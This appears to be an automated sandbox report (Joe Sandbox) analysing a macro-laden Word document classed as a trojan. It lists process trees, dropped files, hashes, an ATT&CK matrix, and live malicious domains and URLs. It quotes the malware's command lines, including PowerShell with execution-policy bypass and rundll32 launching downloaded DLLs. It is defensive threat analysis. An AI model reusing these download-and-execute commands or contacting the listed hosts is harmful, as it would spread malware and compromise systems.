                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldr
                Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldr
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldr
                Source: C:\Windows\System32\cscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
                Source: sample.doc.doc OLE indicator, Word Document stream: true
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$mple.doc.doc
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVREE34.tmp
                Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@25/19@5/4
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
                Source: sample.doc.doc OLE document summary: title field not present or empty
                Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr OLE document summary: title field not present or empty
                Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr OLE document summary: author field not present or empty
                Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr OLE document summary: edited time not present or 0
                Source: ~DFE56B344EF3200177.TMP.0.dr OLE document summary: title field not present or empty
                Source: ~DFE56B344EF3200177.TMP.0.dr OLE document summary: author field not present or empty
                Source: ~DFE56B344EF3200177.TMP.0.dr OLE document summary: edited time not present or 0
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE document summary: title field not present or empty
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE document summary: author field not present or empty
                Source: ~DF77272A7F6F18B150.TMP.0.dr OLE document summary: edited time not present or 0
                Source: ~DF26415DDA42946BBE.TMP.0.dr OLE document summary: title field not present or empty
                Source: ~DF26415DDA42946BBE.TMP.0.dr OLE document summary: author field not present or empty
                Source: ~DF26415DDA42946BBE.TMP.0.dr OLE document summary: edited time not present or 0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32
                Source: C:\Windows\System32\rundll32.exe Automated click: OK
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: :ystem.pdb& source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: System.pdbgement.Automation.pdbBBw source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\System.pdby source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: System.pdb8 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

                Data Obfuscation:

                Document contains an embedded VBA with many string operations indicating source code obfuscation
                Source: sample.doc.doc Stream path 'Macros/VBA/Module1' : High number of string operations
                Source: sample.doc.doc Stream path 'Macros/VBA/Module2' : High number of string operations
                Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module Module1 Name: Module1
                Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module Module2 Name: Module2
                Source: ~DF77272A7F6F18B150.TMP.0.dr Stream path 'VBA/Module1' : High number of string operations
                Source: ~DF77272A7F6F18B150.TMP.0.dr Stream path 'VBA/Module2' : High number of string operations
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1708 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_000007FF00260F5C sldt word ptr [eax]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: powershell.exe, 00000003.00000002.480149738.00000000003F2000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

                HIPS / PFW / Operating System Protection Evasion:

                Yara detected Powershell download and execute
                Source: Yara match File source: sample.doc.doc, type: SAMPLE
                Source: Yara match File source: C:\Users\user\AppData\Roaming\www.ps1, type: DROPPED
                Source: Yara match File source: C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP, type: DROPPED
                Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp, type: DROPPED
                Source: Yara match File source: C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP, type: DROPPED
                Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1
                Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr
                Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr
                Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr
                Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr
                Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldr
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldr
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldr
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldr
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
                Source: C:\Windows\System32\cscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Mitre Att&ck Matrix

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Command and Scripting Interpreter 1 | Path Interception | Process Injection 11 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Scripting 52 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Logon Script (Windows) | Modify Registry 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 4 | SIM Card Swap | | Carrier Billing Fraud
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 11 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 52 | Cached Domain Credentials | System Information Discovery 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Rundll32 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                Behavior Graph

                Behavior Graph ID: 528758, Sample: sample.doc.vir, Startdate: 25/11/2021, Architecture: WINDOWS, Score: 100

                Signatures: Multi AV Scanner detection for domain / URL; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 13 other signatures

                Process tree:
                • WINWORD.EXE (started)
                  dropped: C:\Users\user\AppData\Roaming\www.txt, ASCII
                  dropped: C:\Users\user\AppData\Roaming\www.ps1, ASCII
                  dropped: C:\Users\user\...\~DF77272A7F6F18B150.TMP, Composite
                  dropped: 2 other malicious files
                  • cscript.exe (started)
                    • powershell.exe (started)
                      DNS/IP: yoowi.net 210.211.111.87, 443, 49170 VTDC-AS-VNVietel-CHTCompamyLtdVN Viet Nam
                      DNS/IP: gruasingenieria.pe 192.185.17.114, 443, 49169 UNIFIEDLAYER-AS-1US United States
                      DNS/IP: 3 other IPs or domains
                      dropped: C:\ProgramData\www4.dll, HTML
                      dropped: C:\ProgramData\www3.dll, HTML
                      dropped: C:\ProgramData\www1.dll, HTML
                    • cmd.exe (started)
                      • rundll32.exe (started)
                    • cmd.exe (started)
                      • rundll32.exe (started)
                    • 3 other processes
                      • rundll32.exe (started)
                      • rundll32.exe (started)
                      • rundll32.exe (started)

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label
                sample.doc.doc | 50% | Virustotal |
                sample.doc.doc | 60% | ReversingLabs | Document-Word.Trojan.Donoff
                sample.doc.doc | 100% | Avira | W97M/Agent.9761513

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                Source | Detection | Scanner | Label
                ghapan.com | 9% | Virustotal |
                yoowi.net | 9% | Virustotal |
                chaturanga.groopy.com | 9% | Virustotal |
                gruasingenieria.pe | 7% | Virustotal |

                URLs


                Domains and IPs

                Contacted Domains

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                ghapan.com | 136.243.74.161 | true | true | | unknown
                yoowi.net | 210.211.111.87 | true | true | | unknown
                chaturanga.groopy.com | 143.95.80.83 | true | true | | unknown
                gruasingenieria.pe | 192.185.17.114 | true | true | | unknown
                lotolands.com | unknown | unknown | true | | unknown

                  Contacted URLs

                  Name | Malicious | Antivirus Detection | Reputation
                  https://chaturanga.groopy.com/cgi-sys/suspendedpage.cgi | false | Avira URL Cloud: safe | unknown
                  https://gruasingenieria.pe/LUS1NTVui6/090921.html | true | Avira URL Cloud: safe | unknown
                  https://ghapan.com/Kdg73onC3oQ/090921.html | true | Avira URL Cloud: safe | unknown
                  https://chaturanga.groopy.com/7SEZBnhMLW/130921.html | true | Avira URL Cloud: safe | unknown
                  https://yoowi.net/tDzEJ8uVGwdj/130921.html | true | Avira URL Cloud: safe | unknown
                  https://ghapan.com/cgi-sys/suspendedpage.cgi | true | Avira URL Cloud: safe | unknown

                  URLs from Memory and Binaries

                                  https://chaturanga.groopy.com/powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://secure.comodo.com/CPS0powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmpfalse
                                    high
                                    http://crl.entrust.net/2048ca.crl0powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmpfalse
                                      high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
136.243.74.161 | ghapan.com | Germany | 24940 | HETZNER-ASDE | true
143.95.80.83 | chaturanga.groopy.com | United States | 62729 | ASMALLORANGE1US | true
192.185.17.114 | gruasingenieria.pe | United States | 46606 | UNIFIEDLAYER-AS-1US | true
210.211.111.87 | yoowi.net | Viet Nam | 38731 | VTDC-AS-VNVietel-CHTCompamyLtdVN | true

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 528758
Start date: 25.11.2021
Start time: 18:38:30
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 57s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: sample.doc.vir (renamed file extension from vir to doc)
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@25/19@5/4
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 3
• Number of non-executed functions: 1
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): WMIADAP.exe, conhost.exe
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
18:39:32 | API Interceptor | 153x Sleep call for process: cscript.exe modified
18:39:36 | API Interceptor | 148x Sleep call for process: powershell.exe modified

                                      Joe Sandbox View / Context

                                      IPs


                                                                                              Domains


                                                                                              ASN


                                                                                              JA3 Fingerprints

                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              ReadMe[2021.11.17_21-03].xlsbGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              Offer[2021.11.17_21-03].xlsbGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              Faq[2021.11.17_21-03].xlsbGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              Invoice-947266_20211101.xlsbGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              RFQ_09AM-C206521-R1.docxGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              justificantes anticipos.xlsxGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              TyUOF4dZ7c.docGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              AWDX081511X1521.docGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              ETS_0100000456_063256.xlsmGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83
                                                                                              Quote_325444.xlsmGet hashmaliciousBrowse
                                                                                              • 192.185.17.114
                                                                                              • 210.211.111.87
                                                                                              • 136.243.74.161
                                                                                              • 143.95.80.83

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\ProgramData\www1.dll
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):7614
                                                                                              Entropy (8bit):5.642423826253519
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJtsPF:QJvVGaRF8I8s
                                                                                              MD5:EA2597342C982B12B68284EDBED9731C
                                                                                              SHA1:AFFB0B67308FA3D3CE363653C40915E054D398E3
                                                                                              SHA-256:654876EDD695BA8A02D4BF9EF07DA9137265B40C29A45F63DB66781C497914B1
                                                                                              SHA-512:4ADC4250D7DDB44948CF1AB24240DDEF9DA9969B87B6E48056C4FD703B3E73EE09B8219F515DCAA786F5B43588DDD8019627BB81A3E564121A66F702BFA9C78C
                                                                                              Malicious:true
                                                                                              Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                                              C:\ProgramData\www3.dll
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:HTML document, UTF-8 Unicode text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1984
                                                                                              Entropy (8bit):5.161132909110193
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:tnKMUSlcLvEGG3CRgRffWYqvBDOwfjRWBsk:RK8jN40ff0/In
                                                                                              MD5:6AA676D74FD9026D8636C06E27E0509B
                                                                                              SHA1:F6C84C972FD7C3EC6B17A21928091C5C0742901C
                                                                                              SHA-256:EEB31BA843E10D248144DF0E76F53AB79FF33891511FAB466C83CD049BB1E337
                                                                                              SHA-512:BC600F1DC5C8F841E101394A4F7C6CBE3D4F49DA18D0A1281B51B0DC0AF90D6117E4382377881DAFF2C06309D9B6FC7266A52CB3CE6F8A69D7CC4F2A1A28EB4E
                                                                                              Malicious:true
                                                                                              Preview: <!DOCTYPE html>..<html>..<head>..<meta name="generator" content="Ecshop 4.0 Custom by EcshopVietnam.com" />.. <meta charset="utf-8">.. <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, maximum-scale=1, user-scalable=0" />.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta content="NOINDEX,NOFOLLOW" name="robots" />.. <meta http-equiv="refresh" content="3;url=../"> -->.. <title>404 - Not Found!</title>.. <style type="text/css">.. body {.. color: #444444;.. background-color: #EEEEEE;.. font-family: 'Trebuchet MS', sans-serif;.. font-size: 80%;.. }.. h1 {}.. h2 {font-size: 1.2em;}.. #page{.. background-color: #FFFFFF;.. width: 60%;.. margin: 24px auto;.. padding: 12px;.. }.. #header {.. padding: 6px ;.. text-align: center;.. }.. .status3xx {background-color: #475076; color: #FFFFFF;}.. .status4xx {background-colo
                                                                                              C:\ProgramData\www4.dll
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):7636
                                                                                              Entropy (8bit):5.6438902825995445
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJte:QJvVGaRF8I8Q
                                                                                              MD5:06303A16F4C1C5F397F693020EB0765E
                                                                                              SHA1:D2D3C7274B99534C64B91EB1DBC3A49BF40A6F9E
                                                                                              SHA-256:9AC2755720E7F4BD49F21D18AD7E20149762D778DE6708C6E0819493A84B033D
                                                                                              SHA-512:257B4A076C0382D953549251F4816008B6022F90993896B5F81F535133F9FA2813391C0F292BED51CCBD9D0361392321E81DE43F9D34368C8019B393B5D679B7
                                                                                              Malicious:true
                                                                                              Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
